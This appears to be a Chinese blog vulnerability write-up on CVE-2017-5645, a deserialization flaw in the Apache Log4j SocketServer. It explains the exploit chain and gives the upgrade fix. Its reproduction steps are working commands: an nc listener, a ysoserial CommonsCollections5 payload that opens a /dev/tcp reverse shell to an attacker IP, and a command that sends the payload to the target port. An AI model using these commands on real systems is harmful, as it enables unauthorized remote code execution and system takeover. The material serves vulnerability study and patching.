CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

世界尽头与你2026-02-04 9:10

CVSS评分:9.8(严重)

CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

  • [1. 漏洞原理](#1. 漏洞原理)
  • [2. 漏洞危害](#2. 漏洞危害)
  • [3. 漏洞修复](#3. 漏洞修复)

1. 漏洞原理

Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。Apache Log4j 2.8.2之前的2.x版本中存在代码问题漏洞。攻击者可利用该漏洞执行任意代码。

漏洞利用链:

plain 复制代码 
攻击者
  ↓
TCP / UDP 发送恶意序列化对象
  ↓
Log4j SocketServer
  ↓
ObjectInputStream.readObject()
  ↓
Gadget chain
  ↓
任意代码执行

攻击者需要满足条件:

  • 目标服务器开启并监听 Log4j Socket Server(TCP 或 UDP)端口
  • 可以向服务器发送任意数据包

具体利用路径概括如下:

  1. 攻击者构造特制的 Java 序列化对象字节流,包含恶意链
  2. 通过网络向 Log4j 的 socket 端口发送该 payload
  3. Log4j 接收到数据后反序列化该对象
  4. 恶意对象触发执行攻击者指定的系统命令

step:

1、nc 监听本地

https://www.revshells.com/

bash 复制代码 
nc -lvnp 9001

2、生成恶意payload

bash 复制代码 
java -jar ysoserial.jar CommonsCollections5 "sh -i >& /dev/tcp/172.30.22.210/9001 0>&1" > payload.bin

3、发送,反弹shell

bash 复制代码 
nc 172.xxx.xxx.xxx 5007 < payload.bin

2. 漏洞危害

微步标记为高风险,重点两高一弱漏洞:

该漏洞可导致直接RCE,尽快修复

3. 漏洞修复

  • 升级到 Apache Log4j 2.8.2 或以上 版本
相关推荐
迎仔2 小时前
03-Apache Tez 通俗指南:MapReduce 的“高速公路”升级包
大数据·apache·mapreduce
世界尽头与你2 小时前
CVE-2025-55752_ Apache Tomcat 安全漏洞
java·安全·网络安全·渗透测试·tomcat·apache
HMX4042 小时前
【春秋云境】CVE-2025-44137 TileServer PHP v2.0任意文件读取漏洞
apache·安全漏洞·漏洞复测
Whoami!2 小时前
⓫⁄₁₀ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 动态链接库(dll)文件劫持(下)
windows·网络安全·信息安全·dll劫持
迎仔2 小时前
08-Apache Iceberg 通俗指南:给“胡乱堆放”的文件加个“智能账本”
apache·iceberg
cyhty11 小时前
静态路由实验报告
网络·网络安全
世界尽头与你12 小时前
(修复方案)CVE-2023-22047: Oracle PeopleSoft Enterprise PeopleTools 未授权访问漏洞
数据库·安全·oracle·渗透测试
世界尽头与你21 小时前
(修复方案)CVE-2023-26111: node-static 路径遍历漏洞
安全·网络安全·渗透测试
王锋(oxwangfeng)21 小时前
Apache Flink 在 Kubernetes 上的高效部署与优化实践
flink·kubernetes·apache
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)032025 年大语言模型发展回顾:关键突破、意外转折与 2026 年展望04Claude Code Skills 实用使用手册05Clawdbot 中文汉化版 接入微信、飞书06Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services07OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书08在Trae中使用Pencil MCP09UV安装并设置国内源10一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示